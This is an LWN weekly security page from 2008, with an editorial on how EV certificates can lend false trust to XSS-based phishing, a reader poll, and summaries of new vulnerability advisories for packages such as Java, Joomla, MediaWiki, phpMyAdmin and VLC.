Security
Extended Validation certificates and cross-site scripting
Cross-site scripting (XSS) is a frequent topic on security forums because it is a common web application flaw that can lead to variety of unpleasant surprises. One of the more frequently seen abuses of an XSS flaw is in the aid of a phishing attack. With the advent of Extended Validation (EV) certificates coupled with the accompanying browser UI changes, some XSS attacks will become much more powerful.
By now, most users are familiar with SSL certificates, which are used to authenticate one or both sides of an HTTPS connection to the other. EV certificates are a step up from a more pedestrian SSL certificate as the recipient must undergo more scrutiny from the certificate authority (CA) before being granted one. We covered EV certificates in more detail in November 2006, but they are just now starting to be installed more widely.
Netcraft reported the problem a few weeks ago with regard to sourceforge.net. Sourceforge is one of the 4,000 or so sites with an EV certificate, but it also has an XSS problem. So anyone using the site for XSS purposes now gets the benefit of the higher trust that is supposed to be embodied in an EV certificate.
Browser vendors are being encouraged to highlight the EV certificates in their UI so as to give users more confidence in those sites. The most recent Firefox 3 betas as well as IE7 are highlighting the site name in green in the address bar to denote this higher trust. Unfortunately, the extra validation does not extend to testing the site for XSS flaws, which could leave users easily fooled.
A phishing attack could use an XSS flaw in a search box or error message, for example, to add content to the appearance of a site. That content is really coming from the XSS attack but it would appear under the "green means go" address bar for the EV certificate-protected site. That content could include a login screen that sent the credentials elsewhere or a cookie stealing attack for session hijacking. For any site with sensitive information, XSS attacks are already a problem, EV certificates just add another mechanism for exploiting the user's trust.
Much like the padlock icon that appeared many years ago to denote a "secure" (really, just encrypted) connection, this new green address bar indicator is somewhat difficult to explain. Based on the vetting process for EV certificates, there should be a real entity behind an EV certificate—or at least there was one at the time of issuance—but it is by no means an endorsement of the security of everything on a web page that has one. It is, like the original padlock, more nuanced than that.
Unfortunately, users are not good at security nuances. They want yes or no answers to "Is this site safe?"; that answer is nearly always "maybe" or perhaps "probably". At one time, the padlock icon was seen as a "yes" answer; now the green address bar may take its place. Somehow users need to be taught to look beyond simple answers and websites need to clean up their act so that their users are not scammed.
The number of sites with XSS problems is staggering (a look at xssed.com is instructive) and new ones crop up all the time. In many ways, XSS is an attack against users rather than directly against a site. This may make it less of a priority to fix than a direct attack, like a SQL injection, might be. That is very unfortunate for their users, especially if they have a shiny new EV certificate.
Removing the updated vulnerability listings
The LWN Security page has lots of useful information, but sometimes it seems to stretch on for a long ways. A lot of that length is contained in the "Updated vulnerabilities" section and we are starting to wonder if that really adds that much to the page. It is collected automatically from our daily security updates, so removing it won't help us kick out the weekly edition any faster, but it might make reading the page, especially in the "one big page" format, somewhat easier. If we removed that section, the information will still appear in the daily summaries, of course, and be available by searching our database. Before we do that, though, we'd like to hear from our readers regarding their thoughts on the matter. Please comment if you have thoughts one way or the other.
New vulnerabilities
java: multiple vulnerabilities
| Package(s): | java-1.5.0-sun | CVE #(s): | CVE-2008-1185 CVE-2008-1186 CVE-2008-1187 CVE-2008-1188 CVE-2008-1189 CVE-2008-1190 CVE-2008-1191 CVE-2008-1192 CVE-2008-1193 CVE-2008-1194 CVE-2008-1195 CVE-2008-1196 | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Created: | March 7, 2008 | Updated: | July 16, 2008 | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Description: | From the Red Hat advisory:
Flaws in the JRE allowed an untrusted application or applet to elevate its privileges. This could be exploited by a remote attacker to access local files or execute local applications accessible to the user running the JRE (CVE-2008-1185, CVE-2008-1186) A flaw was found in the Java XSLT processing classes. An untrusted application or applet could cause a denial of service, or execute arbitrary code with the permissions of the user running the JRE. (CVE-2008-1187) Several buffer overflow flaws were found in Java Web Start (JWS). An untrusted JNLP application could access local files or execute local applications accessible to the user running the JRE. (CVE-2008-1188, CVE-2008-1189, CVE-2008-1190, CVE-2008-1191, CVE-2008-1196) A flaw was found in the Java Plug-in. A remote attacker could bypass the same origin policy, executing arbitrary code with the permissions of the user running the JRE. (CVE-2008-1192) A flaw was found in the JRE image parsing libraries. An untrusted application or applet could cause a denial of service, or possible execute arbitrary code with the permissions of the user running the JRE. (CVE-2008-1193) A flaw was found in the JRE color management library. An untrusted application or applet could trigger a denial of service (JVM crash). (CVE-2008-1194) The JRE allowed untrusted JavaScript code to create local network connections by the use of Java APIs. A remote attacker could use these flaws to acesss local network services. (CVE-2008-1195) | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Alerts: |
| ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
joomla: multiple vulnerabilities
| Package(s): | joomla | CVE #(s): | CVE-2007-6642 CVE-2007-6643 CVE-2007-6644 CVE-2007-6645 | ||||
| Created: | March 6, 2008 | Updated: | March 12, 2008 | ||||
| Description: | The Joomla PHP-based content management system has the following vulnerabilities: There are multiple cross-site request forgery vulnerabilities. There is one cross-site scripting vulnerability. There is a vulnerability where remote authenticated administrators can promote arbitrary users to the administrator group, violating the intended security model. There is a registered user privilege escalation vulnerability. | ||||||
| Alerts: |
| ||||||
kronolith: privilege escalation and more?
| Package(s): | kronolith | CVE #(s): | |||||||||
| Created: | March 10, 2008 | Updated: | March 12, 2008 | ||||||||
| Description: | The Fedora advisory is light on details: Fix privilege escalation in Horde API. Fix missing ownership validation on share changes. | ||||||||||
| Alerts: |
| ||||||||||
libnet-dns-perl: denial of service
| Package(s): | libnet-dns-perl | CVE #(s): | CVE-2007-6341 CVE-2007-3409 | ||||||||||||
| Created: | March 12, 2008 | Updated: | March 27, 2008 | ||||||||||||
| Description: | The libnet-dns-perl package can crash when decoding malformed A records, creating a denial of service vulnerability. Also, the domain name expander can be sent into an infinite loop, also a denial of service problem. | ||||||||||||||
| Alerts: |
| ||||||||||||||
lighttpd: cgi source disclosure
| Package(s): | lighttpd | CVE #(s): | CVE-2008-1111 | ||||||||||||||||||||
| Created: | March 7, 2008 | Updated: | April 4, 2008 | ||||||||||||||||||||
| Description: | lighttpd before 1.4.18 is vulnerable to cgi source disclosure. | ||||||||||||||||||||||
| Alerts: |
| ||||||||||||||||||||||
MediaWiki: cross-site scripting
| Package(s): | mediawiki | CVE #(s): | CVE-2008-0460 | ||||||||||||
| Created: | March 7, 2008 | Updated: | December 24, 2008 | ||||||||||||
| Description: | From the CVE entry: Cross-site scripting (XSS) vulnerability in api.php in (1) MediaWiki 1.11 through 1.11.0rc1, 1.10 through 1.10.2, 1.9 through 1.9.4, and 1.8; and (2) the BotQuery extension for MediaWiki 1.7 and earlier; when Internet Explorer is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. | ||||||||||||||
| Alerts: |
| ||||||||||||||
moin: multiple vulnerabilities
| Package(s): | moin | CVE #(s): | CVE-2007-2637 CVE-2008-0782 CVE-2008-1098 CVE-2008-1099 | ||||||||||||||||||||
| Created: | March 10, 2008 | Updated: | January 30, 2009 | ||||||||||||||||||||
| Description: | From the Debian advisory: CVE-2007-2637: Access control lists for calendars and includes were insufficiently enforced, which could lead to information disclosure. CVE-2008-0782: A directory traversal vulnerability in cookie handling could lead to local denial of service by overwriting files. CVE-2008-1098: Cross-site-scripting vulnerabilities have been discovered in the GUI editor formatter and the code to delete pages. CVE-2008-1099: The macro code validates access control lists insufficiently, which could lead to information disclosure. | ||||||||||||||||||||||
| Alerts: |
| ||||||||||||||||||||||
nx: multiple vulnerabilites
| Package(s): | nx | CVE #(s): | |||||
| Created: | March 7, 2008 | Updated: | March 12, 2008 | ||||
| Description: | There are multiple vulnerabilities in nx before 3.1.0. | ||||||
| Alerts: |
| ||||||
pdflib: multiple buffer overflows
| Package(s): | pdflib | CVE #(s): | CVE-2007-6561 | ||||
| Created: | March 11, 2008 | Updated: | March 12, 2008 | ||||
| Description: | From the CVE entry: Multiple stack-based buffer overflows in PDFLib allow user-assisted remote attackers to execute arbitrary code via a long filename argument to the PDF_load_image function that results in an overflow in the pdc_fsearch_fopen function, and possibly other vectors. | ||||||
| Alerts: |
| ||||||
phpmyadmin: sql injection
| Package(s): | phpmyadmin | CVE #(s): | CVE-2008-1149 | ||||||||||||||||||||
| Created: | March 10, 2008 | Updated: | February 2, 2009 | ||||||||||||||||||||
| Description: | From the Gentoo advisory: Richard Cunningham reported that phpMyAdmin uses the $_REQUEST variable of $_GET and $_POST as a source for its parameters. An attacker could entice a user to visit a malicious web application that sets an "sql_query" cookie and is hosted on the same domain as phpMyAdmin, and thereby conduct SQL injection attacks with the privileges of the user authenticating in phpMyAdmin afterwards. | ||||||||||||||||||||||
| Alerts: |
| ||||||||||||||||||||||
SynCE: several vulnerabilities
| Package(s): | synce-sync-engine | CVE #(s): | CVE-2007-6703 CVE-2008-1136 | ||||||||||||||||||||||||||||||||||||||||||||||||
| Created: | March 7, 2008 | Updated: | March 12, 2008 | ||||||||||||||||||||||||||||||||||||||||||||||||
| Description: | Red Hat bug #436023:
"Unspecified vulnerability in vdccm before 0.10.1 in SynCE (SynCE-dccm) might allow attackers to cause a denial of service via unspecified vectors."
Red Hat bug #436024:
" | ||||||||||||||||||||||||||||||||||||||||||||||||||
| Alerts: |
| ||||||||||||||||||||||||||||||||||||||||||||||||||
vlc: multiple vulnerabilities
| Package(s): | vlc | CVE #(s): | CVE-2007-6681 CVE-2007-6682 CVE-2007-6683 CVE-2007-6684 CVE-2008-0295 CVE-2008-0296 CVE-2008-0984 | ||||||||
| Created: | March 10, 2008 | Updated: | April 23, 2008 | ||||||||
| Description: | From the Gentoo advisory: * Michal Luczaj and Luigi Auriemma reported that VLC contains boundary errors when handling subtitles in the ParseMicroDvd(), ParseSSA(), and ParseVplayer() functions in the modules/demux/subtitle.c file, allowing for a stack-based buffer overflow (CVE-2007-6681). * The web interface listening on port 8080/tcp contains a format string error in the httpd_FileCallBack() function in the network/httpd.c file (CVE-2007-6682). * The browser plugin possibly contains an argument injection vulnerability (CVE-2007-6683). * The RSTP module triggers a NULL pointer dereference when processing a request without a "Transport" parameter (CVE-2007-6684). * Luigi Auriemma and Remi Denis-Courmont found a boundary error in the modules/access/rtsp/real_sdpplin.c file when processing SDP data for RTSP sessions (CVE-2008-0295) and a vulnerability in the libaccess_realrtsp plugin (CVE-2008-0296), possibly resulting in a heap-based buffer overflow. * Felipe Manzano and Anibal Sacco (Core Security Technologies) discovered an arbitrary memory overwrite vulnerability in VLC's MPEG-4 file format parser (CVE-2008-0984). | ||||||||||
| Alerts: |
| ||||||||||
vobcopy: insecure temp file
| Package(s): | vobcopy | CVE #(s): | CVE-2007-5718 | ||||
| Created: | March 6, 2008 | Updated: | March 12, 2008 | ||||
| Description: | From the Gentoo alert: Joey Hess reported that vobcopy appends data to the file "/tmp/vobcopy.bla" in an insecure manner. A local attacker could exploit this vulnerability to conduct symlink attacks and append data to arbitrary files with the privileges of the user running Vobcopy. | ||||||
| Alerts: |
| ||||||
Page editor: Jake Edge
Next page:
Kernel development>>